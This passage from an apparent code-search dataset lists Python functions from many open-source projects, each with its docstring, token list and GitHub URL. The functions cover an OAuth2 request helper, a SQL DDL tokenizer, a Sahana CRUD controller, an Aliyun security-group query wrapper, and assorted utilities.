def __init__(self, output_dim, n_categories, prior_std=1., learn_prior=False, full=False): """Create and instance of a variational dense embedding layer.""" assert n_categories >= 2, "Need 2 or more categories for embedding!" self.output_dim = output_dim self.n_categories = n_categories self.full = full self.prior_std0 = prior_std self.learn_prior = learn_prior
[ "def", "__init__", "(", "self", ",", "output_dim", ",", "n_categories", ",", "prior_std", "=", "1.", ",", "learn_prior", "=", "False", ",", "full", "=", "False", ")", ":", "assert", "n_categories", ">=", "2", ",", "\"Need 2 or more categories for embedding!\"", ...
https://github.com/gradientinstitute/aboleth/blob/53a3de23dce4d607ffec92be936e83d2dd7ebb3c/aboleth/layers.py#L681-L689
keiffster/program-y
8c99b56f8c32f01a7b9887b5daae9465619d0385
src/programy/storage/stores/nosql/mongo/store/properties.py
python
MongoRegexesStore.add_regex
(self, name, regex)
return self.add_property(name, regex)
[]
def add_regex(self, name, regex): return self.add_property(name, regex)
[ "def", "add_regex", "(", "self", ",", "name", ",", "regex", ")", ":", "return", "self", ".", "add_property", "(", "name", ",", "regex", ")" ]
https://github.com/keiffster/program-y/blob/8c99b56f8c32f01a7b9887b5daae9465619d0385/src/programy/storage/stores/nosql/mongo/store/properties.py#L163-L164
klen/aioauth-client
7672e66053cfd6973261f40741916d2fd52ff97e
aioauth_client/__init__.py
python
OAuth2Client.request
(self, method: str, url: str, params: t.Dict = None, headers: t.Dict = None, access_token: str = None, **options)
return self._request(method, url, headers=headers, params=params, **options)
Request OAuth2 resource.
Request OAuth2 resource.
[ "Request", "OAuth2", "resource", "." ]
def request(self, method: str, url: str, params: t.Dict = None, headers: t.Dict = None, access_token: str = None, **options) -> t.Awaitable[t.Union[t.Dict, str]]: """Request OAuth2 resource.""" url = self._get_url(url) headers = headers or { 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', } access_token = access_token or self.access_token if access_token: headers.setdefault('Authorization', 'Bearer %s' % access_token) return self._request(method, url, headers=headers, params=params, **options)
[ "def", "request", "(", "self", ",", "method", ":", "str", ",", "url", ":", "str", ",", "params", ":", "t", ".", "Dict", "=", "None", ",", "headers", ":", "t", ".", "Dict", "=", "None", ",", "access_token", ":", "str", "=", "None", ",", "*", "*"...
https://github.com/klen/aioauth-client/blob/7672e66053cfd6973261f40741916d2fd52ff97e/aioauth_client/__init__.py#L309-L321
wutianyiRosun/CGNet
cfccea377a6f0a659e807e8759c82dbffba02d7f
model/ESPNet.py
python
CBR.forward
(self, input)
return output
:param input: input feature map :return: transformed feature map
:param input: input feature map :return: transformed feature map
[ ":", "param", "input", ":", "input", "feature", "map", ":", "return", ":", "transformed", "feature", "map" ]
def forward(self, input): ''' :param input: input feature map :return: transformed feature map ''' output = self.conv(input) output = self.bn(output) output = self.act(output) return output
[ "def", "forward", "(", "self", ",", "input", ")", ":", "output", "=", "self", ".", "conv", "(", "input", ")", "output", "=", "self", ".", "bn", "(", "output", ")", "output", "=", "self", ".", "act", "(", "output", ")", "return", "output" ]
https://github.com/wutianyiRosun/CGNet/blob/cfccea377a6f0a659e807e8759c82dbffba02d7f/model/ESPNet.py#L26-L34
sahana/eden
1696fa50e90ce967df69f66b571af45356cc18da
modules/s3db/hrm.py
python
hrm_competency_controller
()
return current.rest_controller("hrm", "competency", # @ToDo: Create these if-required #csv_stylesheet = ("hrm", "competency.xsl"), #csv_template = ("hrm", "competency"), )
RESTful CRUD controller - used for Searching for people by Skill - used for Adding/Editing on Profile page
RESTful CRUD controller - used for Searching for people by Skill - used for Adding/Editing on Profile page
[ "RESTful", "CRUD", "controller", "-", "used", "for", "Searching", "for", "people", "by", "Skill", "-", "used", "for", "Adding", "/", "Editing", "on", "Profile", "page" ]
def hrm_competency_controller(): """ RESTful CRUD controller - used for Searching for people by Skill - used for Adding/Editing on Profile page """ T = current.T s3db = current.s3db s3 = current.response.s3 def prep(r): if r.method in ("create", "create.popup", "update", "update.popup"): # Coming from Profile page? table = r.table get_vars = r.get_vars person_id = get_vars.get("~.person_id", None) if person_id: try: person_id = int(person_id) except ValueError: pass else: field = table.person_id field.default = person_id field.readable = field.writable = False # Additional filtering of the profile section by skill type skill_type_name = get_vars.get("~.skill_id$skill_type_id$name") if skill_type_name: ttable = s3db.hrm_skill_type query = (ttable.name == skill_type_name) rows = current.db(query).select(ttable.id) skill_type_ids = [row.id for row in rows] if skill_type_ids: field = table.skill_id requires = field.requires if isinstance(requires, IS_EMPTY_OR): requires = requires.other if hasattr(requires, "set_filter"): requires.set_filter(filterby = "skill_type_id", filter_opts = skill_type_ids, ) elif not r.id: filter_widgets = [ S3TextFilter(["person_id$first_name", "person_id$middle_name", "person_id$last_name", "person_id$hrm_human_resource.job_title_id$name", ], label = T("Search"), comment = T("You can search by job title or person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons."), ), S3OptionsFilter("skill_id", label = T("Skills"), options = lambda: \ s3_get_filter_opts("hrm_skill", translate=True), ), S3OptionsFilter("competency_id", label = T("Competency"), options = lambda: \ s3_get_filter_opts("hrm_competency_rating", translate=True), ), ] s3db.configure("hrm_competency", filter_widgets = filter_widgets, list_fields = ["person_id", "skill_id", "competency_id", "comments", ], ) return True s3.prep = prep def postp(r, output): if r.interactive: # Custom action button to add the member to a team s3_action_buttons(r) args = ["[id]", "group_membership"] s3.actions.append({"label": str(T("Add to a Team")), "_class": "action-btn", "url": URL(f = "person", args = args, ), } ) return output s3.postp = postp return current.rest_controller("hrm", "competency", # @ToDo: Create these if-required #csv_stylesheet = ("hrm", "competency.xsl"), #csv_template = ("hrm", "competency"), )
[ "def", "hrm_competency_controller", "(", ")", ":", "T", "=", "current", ".", "T", "s3db", "=", "current", ".", "s3db", "s3", "=", "current", ".", "response", ".", "s3", "def", "prep", "(", "r", ")", ":", "if", "r", ".", "method", "in", "(", "\"crea...
https://github.com/sahana/eden/blob/1696fa50e90ce967df69f66b571af45356cc18da/modules/s3db/hrm.py#L7693-L7790
007gzs/dingtalk-sdk
7979da2e259fdbc571728cae2425a04dbc65850a
dingtalk/client/api/taobao.py
python
TbALiYun.ecs_aliyuncs_com_DescribeSecurityGroups_2013_01_10
( self, region_id, page_number='1', page_size='10' )
return self._top_request( "ecs.aliyuncs.com.DescribeSecurityGroups.2013-01-10", { "RegionId": region_id, "PageNumber": page_number, "PageSize": page_size } )
查询安全组列表 !!!该接口已在官方文档下线,请谨慎使用!!! 分页查询用户定义的所有安全组基本信息。每页的数量默认为10条,数据按照安全组ID降序排列。 文档地址:https://open-doc.dingtalk.com/docs/api.htm?apiId=22433 :param region_id: 数据中心id :param page_number: 当前页码,起始值为1,默认值为1 :param page_size: 分页查询时设置的每页行数,最大值50,默认值为10
查询安全组列表 !!!该接口已在官方文档下线,请谨慎使用!!!
[ "查询安全组列表", "!!!该接口已在官方文档下线,请谨慎使用!!!" ]
def ecs_aliyuncs_com_DescribeSecurityGroups_2013_01_10( self, region_id, page_number='1', page_size='10' ): """ 查询安全组列表 !!!该接口已在官方文档下线,请谨慎使用!!! 分页查询用户定义的所有安全组基本信息。每页的数量默认为10条,数据按照安全组ID降序排列。 文档地址:https://open-doc.dingtalk.com/docs/api.htm?apiId=22433 :param region_id: 数据中心id :param page_number: 当前页码,起始值为1,默认值为1 :param page_size: 分页查询时设置的每页行数,最大值50,默认值为10 """ return self._top_request( "ecs.aliyuncs.com.DescribeSecurityGroups.2013-01-10", { "RegionId": region_id, "PageNumber": page_number, "PageSize": page_size } )
[ "def", "ecs_aliyuncs_com_DescribeSecurityGroups_2013_01_10", "(", "self", ",", "region_id", ",", "page_number", "=", "'1'", ",", "page_size", "=", "'10'", ")", ":", "return", "self", ".", "_top_request", "(", "\"ecs.aliyuncs.com.DescribeSecurityGroups.2013-01-10\"", ",", ...
https://github.com/007gzs/dingtalk-sdk/blob/7979da2e259fdbc571728cae2425a04dbc65850a/dingtalk/client/api/taobao.py#L36921-L36945
eliben/pyelftools
8f7a0becaface09435c4374947548b7851e3d1a2
elftools/dwarf/lineprogram.py
python
LineProgram.__getitem__
(self, name)
return self.header[name]
Implement dict-like access to header entries
Implement dict-like access to header entries
[ "Implement", "dict", "-", "like", "access", "to", "header", "entries" ]
def __getitem__(self, name): """ Implement dict-like access to header entries """ return self.header[name]
[ "def", "__getitem__", "(", "self", ",", "name", ")", ":", "return", "self", ".", "header", "[", "name", "]" ]
https://github.com/eliben/pyelftools/blob/8f7a0becaface09435c4374947548b7851e3d1a2/elftools/dwarf/lineprogram.py#L121-L124
oddt/oddt
8cf555820d97a692ade81c101ebe10e28bcb3722
oddt/pandas.py
python
ChemDataFrame.to_sdf
(self, filepath_or_buffer=None, update_properties=True, molecule_column=None, columns=None)
return _mol_writer(self, filepath_or_buffer=filepath_or_buffer, update_properties=update_properties, fmt='sdf', molecule_column=molecule_column, columns=columns)
Write DataFrame to SDF file. .. versionadded:: 0.3 Parameters ---------- filepath_or_buffer : string or None File path update_properties : bool, optional (default=True) Switch to update properties from the DataFrames to the molecules while writting. molecule_column : string or None, optional (default='mol') Name of molecule column. If None the molecules will be skipped. columns : list or None, optional (default=None) A list of columns to write to file. If None then all available fields are written.
Write DataFrame to SDF file.
[ "Write", "DataFrame", "to", "SDF", "file", "." ]
def to_sdf(self, filepath_or_buffer=None, update_properties=True, molecule_column=None, columns=None): """Write DataFrame to SDF file. .. versionadded:: 0.3 Parameters ---------- filepath_or_buffer : string or None File path update_properties : bool, optional (default=True) Switch to update properties from the DataFrames to the molecules while writting. molecule_column : string or None, optional (default='mol') Name of molecule column. If None the molecules will be skipped. columns : list or None, optional (default=None) A list of columns to write to file. If None then all available fields are written. """ molecule_column = molecule_column or self._molecule_column return _mol_writer(self, filepath_or_buffer=filepath_or_buffer, update_properties=update_properties, fmt='sdf', molecule_column=molecule_column, columns=columns)
[ "def", "to_sdf", "(", "self", ",", "filepath_or_buffer", "=", "None", ",", "update_properties", "=", "True", ",", "molecule_column", "=", "None", ",", "columns", "=", "None", ")", ":", "molecule_column", "=", "molecule_column", "or", "self", ".", "_molecule_co...
https://github.com/oddt/oddt/blob/8cf555820d97a692ade81c101ebe10e28bcb3722/oddt/pandas.py#L379-L410
minio/minio-py
b3ba3bf99fe6b9ff2b28855550d6ab5345c134e3
minio/notificationconfig.py
python
TopicConfig.fromxml
(cls, element)
return cls( topic, events, config_id, prefix_filter_rule, suffix_filter_rule )
Create new object with values from XML element.
Create new object with values from XML element.
[ "Create", "new", "object", "with", "values", "from", "XML", "element", "." ]
def fromxml(cls, element): """Create new object with values from XML element.""" topic = findtext(element, "Topic", True) (events, config_id, prefix_filter_rule, suffix_filter_rule) = cls.parsexml(element) return cls( topic, events, config_id, prefix_filter_rule, suffix_filter_rule )
[ "def", "fromxml", "(", "cls", ",", "element", ")", ":", "topic", "=", "findtext", "(", "element", ",", "\"Topic\"", ",", "True", ")", "(", "events", ",", "config_id", ",", "prefix_filter_rule", ",", "suffix_filter_rule", ")", "=", "cls", ".", "parsexml", ...
https://github.com/minio/minio-py/blob/b3ba3bf99fe6b9ff2b28855550d6ab5345c134e3/minio/notificationconfig.py#L243-L254
the4thdoctor/pg_chameleon
9d80212541559c8d0a42b3e7c1b2c67bb7606411
pg_chameleon/lib/sql_util.py
python
sql_token.parse_sql
(self, sql_string)
The method cleans and parses the sql string A regular expression replaces all the default value definitions with a space. Then the statements are split in a list using the statement separator; For each statement a set of regular expressions remove the comments, single and multi line. Parenthesis are surrounded by spaces and commas are rewritten in order to get at least one space after the comma. The statement is then put on a single line and stripped. Different match are performed on the statement. RENAME TABLE CREATE TABLE DROP TABLE ALTER TABLE ALTER INDEX DROP PRIMARY KEY TRUNCATE TABLE The match which is successful determines the parsing of the rest of the statement. Each parse builds a dictionary with at least two keys "name" and "command". Each statement parse comes with specific addictional keys. When the token dictionary is complete is added to the class list tokenised :param sql_string: The sql string with the sql statements.
The method cleans and parses the sql string A regular expression replaces all the default value definitions with a space. Then the statements are split in a list using the statement separator;
[ "The", "method", "cleans", "and", "parses", "the", "sql", "string", "A", "regular", "expression", "replaces", "all", "the", "default", "value", "definitions", "with", "a", "space", ".", "Then", "the", "statements", "are", "split", "in", "a", "list", "using",...
def parse_sql(self, sql_string): """ The method cleans and parses the sql string A regular expression replaces all the default value definitions with a space. Then the statements are split in a list using the statement separator; For each statement a set of regular expressions remove the comments, single and multi line. Parenthesis are surrounded by spaces and commas are rewritten in order to get at least one space after the comma. The statement is then put on a single line and stripped. Different match are performed on the statement. RENAME TABLE CREATE TABLE DROP TABLE ALTER TABLE ALTER INDEX DROP PRIMARY KEY TRUNCATE TABLE The match which is successful determines the parsing of the rest of the statement. Each parse builds a dictionary with at least two keys "name" and "command". Each statement parse comes with specific addictional keys. When the token dictionary is complete is added to the class list tokenised :param sql_string: The sql string with the sql statements. """ statements=sql_string.split(';') for statement in statements: stat_dic={} stat_cleanup=re.sub(r'/\*.*?\*/', '', statement, re.DOTALL) stat_cleanup=re.sub(r'--.*?\n', '', stat_cleanup) stat_cleanup=re.sub(r'[\b)\b]', ' ) ', stat_cleanup) stat_cleanup=re.sub(r'[\b(\b]', ' ( ', stat_cleanup) stat_cleanup=re.sub(r'[\b,\b]', ', ', stat_cleanup) stat_cleanup=stat_cleanup.replace('\n', ' ') stat_cleanup = re.sub("\([\w*\s*]\)", " ", stat_cleanup) stat_cleanup = stat_cleanup.strip() malter_rename = self.m_alter_rename_table.match(stat_cleanup) mrename_table = self.m_rename_table.match(stat_cleanup) mcreate_table = self.m_create_table.match(stat_cleanup) mdrop_table = self.m_drop_table.match(stat_cleanup) malter_table = self.m_alter_table.match(stat_cleanup) malter_index = self.m_alter_index.match(stat_cleanup) mdrop_primary = self.m_drop_primary.match(stat_cleanup) mtruncate_table = self.m_truncate_table.match(stat_cleanup) if malter_rename: stat_dic["command"] = "RENAME TABLE" stat_dic["name"] = malter_rename.group(2) stat_dic["new_name"] = malter_rename.group(3) self.tokenised.append(stat_dic) stat_dic = {} elif mrename_table: rename_list = self.parse_rename_table(mrename_table.group(2)) for rename_table in rename_list: stat_dic["command"] = "RENAME TABLE" stat_dic["name"] = rename_table[0] stat_dic["new_name"] = rename_table[1] self.tokenised.append(stat_dic) stat_dic = {} elif mcreate_table: command=' '.join(mcreate_table.group(1).split()).upper().strip() stat_dic["command"]=command stat_dic["name"]=mcreate_table.group(2) create_parsed=self.parse_create_table(stat_cleanup, stat_dic["name"]) stat_dic["columns"]=create_parsed["columns"] stat_dic["indices"]=create_parsed["indices"] elif mdrop_table: command=' '.join(mdrop_table.group(1).split()).upper().strip() stat_dic["command"]=command stat_dic["name"]=mdrop_table.group(2) elif mtruncate_table: command=' '.join(mtruncate_table.group(1).split()).upper().strip() stat_dic["command"]=command if mtruncate_table.group(3) == '': stat_dic["name"]=mtruncate_table.group(2) else: stat_dic["name"]=mtruncate_table.group(3) elif mdrop_primary: stat_dic["command"]="DROP PRIMARY KEY" stat_dic["name"]=mdrop_primary.group(1).strip().strip(',').replace('`', '').strip() elif malter_index: pass elif malter_table: stat_dic=self.parse_alter_table(malter_table) if len(stat_dic["alter_cmd"]) == 0: stat_dic = {} if stat_dic!={}: self.tokenised.append(stat_dic)
[ "def", "parse_sql", "(", "self", ",", "sql_string", ")", ":", "statements", "=", "sql_string", ".", "split", "(", "';'", ")", "for", "statement", "in", "statements", ":", "stat_dic", "=", "{", "}", "stat_cleanup", "=", "re", ".", "sub", "(", "r'/\\*.*?\\...
https://github.com/the4thdoctor/pg_chameleon/blob/9d80212541559c8d0a42b3e7c1b2c67bb7606411/pg_chameleon/lib/sql_util.py#L423-L514
sagemath/sagenb
67a73cbade02639bc08265f28f3165442113ad4d
sagenb/notebook/worksheet.py
python
after_first_word
(s)
return s[i.start() + 1:]
r""" Return everything after the first whitespace in the string s. Returns the empty string if there is nothing after the first whitespace. INPUT: - ``s`` - string OUTPUT: a string EXAMPLES:: sage: from sagenb.notebook.worksheet import after_first_word sage: after_first_word("\%gap\n2+2\n") '2+2\n' sage: after_first_word("2+2") ''
r""" Return everything after the first whitespace in the string s. Returns the empty string if there is nothing after the first whitespace.
[ "r", "Return", "everything", "after", "the", "first", "whitespace", "in", "the", "string", "s", ".", "Returns", "the", "empty", "string", "if", "there", "is", "nothing", "after", "the", "first", "whitespace", "." ]
def after_first_word(s): r""" Return everything after the first whitespace in the string s. Returns the empty string if there is nothing after the first whitespace. INPUT: - ``s`` - string OUTPUT: a string EXAMPLES:: sage: from sagenb.notebook.worksheet import after_first_word sage: after_first_word("\%gap\n2+2\n") '2+2\n' sage: after_first_word("2+2") '' """ i = whitespace.search(s) if i is None: return '' return s[i.start() + 1:]
[ "def", "after_first_word", "(", "s", ")", ":", "i", "=", "whitespace", ".", "search", "(", "s", ")", "if", "i", "is", "None", ":", "return", "''", "return", "s", "[", "i", ".", "start", "(", ")", "+", "1", ":", "]" ]
https://github.com/sagemath/sagenb/blob/67a73cbade02639bc08265f28f3165442113ad4d/sagenb/notebook/worksheet.py#L4392-L4415
mozillazg/pypy
2ff5cd960c075c991389f842c6d59e71cf0cb7d0
rpython/translator/transform.py
python
transform_extend_with_char_count
(self, block_subset)
Transforms lst += char*count to extend_with_char_count
Transforms lst += char*count to extend_with_char_count
[ "Transforms", "lst", "+", "=", "char", "*", "count", "to", "extend_with_char_count" ]
def transform_extend_with_char_count(self, block_subset): """Transforms lst += char*count to extend_with_char_count""" for block in block_subset: mul_sources = {} # maps b to (char, count) in the above notation for i in range(len(block.operations)): op = block.operations[i] if op.opname == 'mul': s0 = self.annotation(op.args[0]) s1 = self.annotation(op.args[1]) if (isinstance(s0, annmodel.SomeChar) and isinstance(s1, annmodel.SomeInteger)): mul_sources[op.result] = op.args[0], op.args[1] elif (isinstance(s1, annmodel.SomeChar) and isinstance(s0, annmodel.SomeInteger)): mul_sources[op.result] = op.args[1], op.args[0] elif (op.opname == 'inplace_add' and op.args[1] in mul_sources and self.gettype(op.args[0]) is list): v_char, v_count = mul_sources[op.args[1]] new_op = SpaceOperation('extend_with_char_count', [op.args[0], v_char, v_count], op.result) block.operations[i] = new_op
[ "def", "transform_extend_with_char_count", "(", "self", ",", "block_subset", ")", ":", "for", "block", "in", "block_subset", ":", "mul_sources", "=", "{", "}", "# maps b to (char, count) in the above notation", "for", "i", "in", "range", "(", "len", "(", "block", ...
https://github.com/mozillazg/pypy/blob/2ff5cd960c075c991389f842c6d59e71cf0cb7d0/rpython/translator/transform.py#L84-L106
rotki/rotki
aafa446815cdd5e9477436d1b02bee7d01b398c8
rotkehlchen/externalapis/cryptocompare.py
python
Cryptocompare.set_database
(self, database: 'DBHandler')
If the cryptocompare instance was initialized without a DB this sets its DB
If the cryptocompare instance was initialized without a DB this sets its DB
[ "If", "the", "cryptocompare", "instance", "was", "initialized", "without", "a", "DB", "this", "sets", "its", "DB" ]
def set_database(self, database: 'DBHandler') -> None: """If the cryptocompare instance was initialized without a DB this sets its DB""" msg = 'set_database was called on a cryptocompare instance that already has a DB' assert self.db is None, msg self.db = database
[ "def", "set_database", "(", "self", ",", "database", ":", "'DBHandler'", ")", "->", "None", ":", "msg", "=", "'set_database was called on a cryptocompare instance that already has a DB'", "assert", "self", ".", "db", "is", "None", ",", "msg", "self", ".", "db", "=...
https://github.com/rotki/rotki/blob/aafa446815cdd5e9477436d1b02bee7d01b398c8/rotkehlchen/externalapis/cryptocompare.py#L251-L255
mvantellingen/localshop
19422b82915e66b62f8c0207a74a6a36613796c6
src/localshop/utils.py
python
no_duplicates
(function, *args, **kwargs)
return wrapper
Makes sure that no duplicated tasks are enqueued.
Makes sure that no duplicated tasks are enqueued.
[ "Makes", "sure", "that", "no", "duplicated", "tasks", "are", "enqueued", "." ]
def no_duplicates(function, *args, **kwargs): """ Makes sure that no duplicated tasks are enqueued. """ @wraps(function) def wrapper(self, *args, **kwargs): key = generate_key(function, *args, **kwargs) try: function(self, *args, **kwargs) finally: logging.info('Removing key %s', key) cache.delete(key) return wrapper
[ "def", "no_duplicates", "(", "function", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "@", "wraps", "(", "function", ")", "def", "wrapper", "(", "self", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "key", "=", "generate_key", "(", ...
https://github.com/mvantellingen/localshop/blob/19422b82915e66b62f8c0207a74a6a36613796c6/src/localshop/utils.py#L25-L38
lunixbochs/ActualVim
1f555ce719e49d6584f0e35e9f0db2f216b98fa5
lib/asyncio/transports.py
python
WriteTransport.get_write_buffer_size
(self)
Return the current size of the write buffer.
Return the current size of the write buffer.
[ "Return", "the", "current", "size", "of", "the", "write", "buffer", "." ]
def get_write_buffer_size(self): """Return the current size of the write buffer.""" raise NotImplementedError
[ "def", "get_write_buffer_size", "(", "self", ")", ":", "raise", "NotImplementedError" ]
https://github.com/lunixbochs/ActualVim/blob/1f555ce719e49d6584f0e35e9f0db2f216b98fa5/lib/asyncio/transports.py#L89-L91
brmson/dataset-factoid-webquestions
668890853388010fe6ae9a5eb035a7917b88933b
scripts/rawimport.py
python
questions_pproc
(questions, ch)
return qs_main, qs_fb
Post-process raw json data, outputting main and freebase-specific data sets.
Post-process raw json data, outputting main and freebase-specific data sets.
[ "Post", "-", "process", "raw", "json", "data", "outputting", "main", "and", "freebase", "-", "specific", "data", "sets", "." ]
def questions_pproc(questions, ch): """ Post-process raw json data, outputting main and freebase-specific data sets. """ qs_main = [] qs_fb = [] for i, q in enumerate(questions): q_main = {'qId': 'wq%c%06d' % (ch, i), 'qText': q['utterance'], 'answers': list(targetsToAnswers(q['targetValue']))} q_fb = {'qId': q_main['qId'], 'freebaseKey': q['url'].replace('http://www.freebase.com/view/en/', '')} qs_main.append(q_main) qs_fb.append(q_fb) return qs_main, qs_fb
[ "def", "questions_pproc", "(", "questions", ",", "ch", ")", ":", "qs_main", "=", "[", "]", "qs_fb", "=", "[", "]", "for", "i", ",", "q", "in", "enumerate", "(", "questions", ")", ":", "q_main", "=", "{", "'qId'", ":", "'wq%c%06d'", "%", "(", "ch", ...
https://github.com/brmson/dataset-factoid-webquestions/blob/668890853388010fe6ae9a5eb035a7917b88933b/scripts/rawimport.py#L29-L41
quantmind/pulsar
fee44e871954aa6ca36d00bb5a3739abfdb89b26
pulsar/apps/wsgi/content.py
python
Html.hasClass
(self, cn)
return classes and cn in classes
``True`` if ``cn`` is a class of self.
``True`` if ``cn`` is a class of self.
[ "True", "if", "cn", "is", "a", "class", "of", "self", "." ]
def hasClass(self, cn): '''``True`` if ``cn`` is a class of self.''' classes = self._classes return classes and cn in classes
[ "def", "hasClass", "(", "self", ",", "cn", ")", ":", "classes", "=", "self", ".", "_classes", "return", "classes", "and", "cn", "in", "classes" ]
https://github.com/quantmind/pulsar/blob/fee44e871954aa6ca36d00bb5a3739abfdb89b26/pulsar/apps/wsgi/content.py#L381-L384
mikedh/trimesh
6b1e05616b44e6dd708d9bc748b211656ebb27ec
trimesh/points.py
python
PointCloud.copy
(self)
return copied
Safely get a copy of the current point cloud. Copied objects will have emptied caches to avoid memory issues and so may be slow on initial operations until caches are regenerated. Current object will *not* have its cache cleared. Returns --------- copied : trimesh.PointCloud Copy of current point cloud
Safely get a copy of the current point cloud.
[ "Safely", "get", "a", "copy", "of", "the", "current", "point", "cloud", "." ]
def copy(self): """ Safely get a copy of the current point cloud. Copied objects will have emptied caches to avoid memory issues and so may be slow on initial operations until caches are regenerated. Current object will *not* have its cache cleared. Returns --------- copied : trimesh.PointCloud Copy of current point cloud """ copied = PointCloud(vertices=None) # copy vertex and face data copied._data.data = copy.deepcopy(self._data.data) # get metadata copied.metadata = copy.deepcopy(self.metadata) # make sure cache is set from here copied._cache.clear() return copied
[ "def", "copy", "(", "self", ")", ":", "copied", "=", "PointCloud", "(", "vertices", "=", "None", ")", "# copy vertex and face data", "copied", ".", "_data", ".", "data", "=", "copy", ".", "deepcopy", "(", "self", ".", "_data", ".", "data", ")", "# get me...
https://github.com/mikedh/trimesh/blob/6b1e05616b44e6dd708d9bc748b211656ebb27ec/trimesh/points.py#L443-L468
bmc/munkres
23d11c83057c7d93fa7f4ebfa191f9b746374792
munkres.py
python
Munkres.__find_star_in_col
(self, col: Sequence[AnyNum])
return row
Find the first starred element in the specified row. Returns the row index, or -1 if no starred element was found.
Find the first starred element in the specified row. Returns the row index, or -1 if no starred element was found.
[ "Find", "the", "first", "starred", "element", "in", "the", "specified", "row", ".", "Returns", "the", "row", "index", "or", "-", "1", "if", "no", "starred", "element", "was", "found", "." ]
def __find_star_in_col(self, col: Sequence[AnyNum]) -> int: """ Find the first starred element in the specified row. Returns the row index, or -1 if no starred element was found. """ row = -1 for i in range(self.n): if self.marked[i][col] == 1: row = i break return row
[ "def", "__find_star_in_col", "(", "self", ",", "col", ":", "Sequence", "[", "AnyNum", "]", ")", "->", "int", ":", "row", "=", "-", "1", "for", "i", "in", "range", "(", "self", ".", "n", ")", ":", "if", "self", ".", "marked", "[", "i", "]", "[",...
https://github.com/bmc/munkres/blob/23d11c83057c7d93fa7f4ebfa191f9b746374792/munkres.py#L392-L403
IronLanguages/main
a949455434b1fda8c783289e897e78a9a0caabb5
External.LCA_RESTRICTED/Languages/CPython/27/Lib/lib-tk/Tkinter.py
python
Misc.winfo_width
(self)
return getint( self.tk.call('winfo', 'width', self._w))
Return the width of this widget.
Return the width of this widget.
[ "Return", "the", "width", "of", "this", "widget", "." ]
def winfo_width(self): """Return the width of this widget.""" return getint( self.tk.call('winfo', 'width', self._w))
[ "def", "winfo_width", "(", "self", ")", ":", "return", "getint", "(", "self", ".", "tk", ".", "call", "(", "'winfo'", ",", "'width'", ",", "self", ".", "_w", ")", ")" ]
https://github.com/IronLanguages/main/blob/a949455434b1fda8c783289e897e78a9a0caabb5/External.LCA_RESTRICTED/Languages/CPython/27/Lib/lib-tk/Tkinter.py#L895-L898
TesterlifeRaymond/BeautifulReport
e13ea7bc3109e8f88279f1033e309b6f909d800d
BeautifulReport.py
python
BeautifulReport.output_report
(self)
生成测试报告到指定路径下 :return:
生成测试报告到指定路径下 :return:
[ "生成测试报告到指定路径下", ":", "return", ":" ]
def output_report(self): """ 生成测试报告到指定路径下 :return: """ template_path = self.config_tmp_path override_path = os.path.abspath(self.log_path) if \ os.path.abspath(self.log_path).endswith('/') else \ os.path.abspath(self.log_path) + '/' with open(template_path, 'rb') as file: body = file.readlines() with open(override_path + self.filename, 'wb') as write_file: for item in body: if item.strip().startswith(b'var resultData'): head = ' var resultData = ' item = item.decode().split(head) item[1] = head + json.dumps(self.FIELDS, ensure_ascii=False, indent=4) item = ''.join(item).encode() item = bytes(item) + b';\n' write_file.write(item)
[ "def", "output_report", "(", "self", ")", ":", "template_path", "=", "self", ".", "config_tmp_path", "override_path", "=", "os", ".", "path", ".", "abspath", "(", "self", ".", "log_path", ")", "if", "os", ".", "path", ".", "abspath", "(", "self", ".", ...
https://github.com/TesterlifeRaymond/BeautifulReport/blob/e13ea7bc3109e8f88279f1033e309b6f909d800d/BeautifulReport.py#L368-L388
tomplus/kubernetes_asyncio
f028cc793e3a2c519be6a52a49fb77ff0b014c9b
kubernetes_asyncio/client/models/v2beta2_metric_spec.py
python
V2beta2MetricSpec.resource
(self, resource)
Sets the resource of this V2beta2MetricSpec. :param resource: The resource of this V2beta2MetricSpec. # noqa: E501 :type: V2beta2ResourceMetricSource
Sets the resource of this V2beta2MetricSpec.
[ "Sets", "the", "resource", "of", "this", "V2beta2MetricSpec", "." ]
def resource(self, resource): """Sets the resource of this V2beta2MetricSpec. :param resource: The resource of this V2beta2MetricSpec. # noqa: E501 :type: V2beta2ResourceMetricSource """ self._resource = resource
[ "def", "resource", "(", "self", ",", "resource", ")", ":", "self", ".", "_resource", "=", "resource" ]
https://github.com/tomplus/kubernetes_asyncio/blob/f028cc793e3a2c519be6a52a49fb77ff0b014c9b/kubernetes_asyncio/client/models/v2beta2_metric_spec.py#L148-L156
holoviz/holoviews
cc6b27f01710402fdfee2aeef1507425ca78c91f
holoviews/core/util.py
python
sort_topologically
(graph)
return list(itertools.takewhile(lambda x: x is not None, (names_by_level.get(i, None) for i in itertools.count())))
Stackless topological sorting. graph = { 3: [1], 5: [3], 4: [2], 6: [4], } sort_topologically(graph) [[1, 2], [3, 4], [5, 6]]
Stackless topological sorting.
[ "Stackless", "topological", "sorting", "." ]
def sort_topologically(graph): """ Stackless topological sorting. graph = { 3: [1], 5: [3], 4: [2], 6: [4], } sort_topologically(graph) [[1, 2], [3, 4], [5, 6]] """ levels_by_name = {} names_by_level = defaultdict(list) def add_level_to_name(name, level): levels_by_name[name] = level names_by_level[level].append(name) def walk_depth_first(name): stack = [name] while(stack): name = stack.pop() if name in levels_by_name: continue if name not in graph or not graph[name]: level = 0 add_level_to_name(name, level) continue children = graph[name] children_not_calculated = [child for child in children if child not in levels_by_name] if children_not_calculated: stack.append(name) stack.extend(children_not_calculated) continue level = 1 + max(levels_by_name[lname] for lname in children) add_level_to_name(name, level) for name in graph: walk_depth_first(name) return list(itertools.takewhile(lambda x: x is not None, (names_by_level.get(i, None) for i in itertools.count())))
[ "def", "sort_topologically", "(", "graph", ")", ":", "levels_by_name", "=", "{", "}", "names_by_level", "=", "defaultdict", "(", "list", ")", "def", "add_level_to_name", "(", "name", ",", "level", ")", ":", "levels_by_name", "[", "name", "]", "=", "level", ...
https://github.com/holoviz/holoviews/blob/cc6b27f01710402fdfee2aeef1507425ca78c91f/holoviews/core/util.py#L1271-L1321
Pylons/substanced
a897f4a0518c51b6e093cc5af39fa326f23752c2
substanced/dump/__init__.py
python
_DumpAndLoad.load
( self, directory, parent=None, subresources=True, verbose=False, dry_run=False, registry=None )
return first
Load a dump of a resource and return the resource.
Load a dump of a resource and return the resource.
[ "Load", "a", "dump", "of", "a", "resource", "and", "return", "the", "resource", "." ]
